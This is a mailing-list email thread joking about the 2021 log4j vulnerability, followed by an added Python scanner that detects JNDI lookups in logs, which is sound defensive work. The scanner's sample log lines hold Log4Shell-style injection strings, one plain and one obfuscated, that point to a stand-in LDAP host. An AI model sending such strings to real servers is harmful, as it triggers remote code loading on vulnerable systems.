I chuckled when I saw this again the other day:

If only it wasn't true.

Regards,

Greg

Dr Greg Low

1300SQLSQL (1300 775 775) office | +61 419201410 mobile
SQL Down Under | Web: https://sqldownunder.com | About me: https://greglow.me

From: [email protected] <[email protected]> On Behalf Of Greg Keogh
Sent: Thursday, 16 December 2021 6:00 PM
To: ozDotNet <[email protected]>
Subject: [OT] log4j Internet Doom

It's almost Friday ...

Many of you might have read the blazing headlines everywhere that the whole 
Internet is about to crash because of a security vulnerability in log4j. I 
haven't written Java since early 2001, so I went looking for tech details.

It turns out someone wrote an appender (in our log4net terms) that parsed a Uri 
out of a special bit of syntax, then blindly loaded and ran what was at the 
Uri. I mean, what could possibly go wrong? I think that this guilty JNDI 
appender is available by default, that is, it's in the JAR or something like 
that (I can't get further fine details on that).

So it's a bit like Aircrash Investigations where it takes multiple things to go 
wrong and make a bigger wrong.

Who could have imagined that a logging library would bring the Internet down?!

Greg
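
The mechanism Greg describes above, a lookup syntax embedded in a logged string that gets parsed into a URI, is also what a defender looks for when sweeping logs. The scanner below is an added example for this thread, not code from the list or from log4j; the lookup semantics it evaluates (case-changing lookups and the ":-fallback" form) are assumed and modelled on the syntax described, and the log lines and the host name lookup-host.example are constructed.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body with no further braces inside it.
INNER = re.compile(r"\$\{([^{}]*)\}")

def flatten(text: str, max_rounds: int = 20) -> Tuple[str, List[str]]:
    """Collapse nested ${...} lookups innermost-first and record each prefix.
    Only case-changing lookups and the ":-fallback" syntax are evaluated
    (assumed semantics, modelled on the lookup syntax the thread describes);
    any other lookup becomes its literal body so the scheme name stays visible."""
    seen: List[str] = []
    for _ in range(max_rounds):
        m = INNER.search(text)
        if not m:
            break
        body = m.group(1)
        prefix, _, rest = body.partition(":")
        prefix = prefix.lower()
        seen.append(prefix)
        if prefix == "lower":
            out = rest.lower()
        elif prefix == "upper":
            out = rest.upper()
        elif prefix != "jndi" and ":-" in body:
            out = body.split(":-", 1)[1]  # ${name:-fallback} -> fallback
        else:
            out = body                    # keep "jndi:..." visible
        text = text[:m.start()] + out + text[m.end():]
    return text, seen

def scan(lines: List[str]) -> List[Tuple[int, Tuple[str, ...], str]]:
    """Return (line_no, lookup prefixes, flattened line) for every line in
    which a jndi: lookup was resolved while flattening."""
    findings = []
    for n, line in enumerate(lines, 1):
        flat, seen = flatten(line)
        if "jndi" in seen:
            findings.append((n, tuple(seen), flat))
    return findings

# Constructed access-log lines (not real traffic); the last field stands in
# for a request header that an application might pass straight to its logger.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login" 200 "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.7 - - "GET /login" 200 "${${lower:J}ndi:ldap://lookup-host.example/a}"',
    '10.0.0.8 - - "GET /api" 500 "${ENV:SHELL:-unset}"',
]
```

Matching the literal text alone misses the third line; flattening the nested lookup first is what surfaces it, while the fourth line's ordinary fallback lookup is left alone.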